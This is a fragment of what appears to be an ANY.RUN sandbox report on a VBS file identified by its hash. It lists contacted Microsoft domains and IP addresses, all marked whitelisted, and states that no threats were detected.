  • 20.190.160.17
  • 40.126.32.136
  • 40.126.32.68
  • 40.126.32.134
  • 20.190.160.22
  • 20.190.160.14
  • 40.126.32.140
  • 40.126.32.72
whitelisted
go.microsoft.com
  • 23.37.9.150
whitelisted
client.wns.windows.com
  • 40.113.103.199
whitelisted
arc.msn.com
  • 20.223.35.26
whitelisted
fd.api.iris.microsoft.com
  • 20.223.35.26
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
733012c16a8f4e25dce16574f12365eb8616c62313da5f97241599c5864f0c50.vbs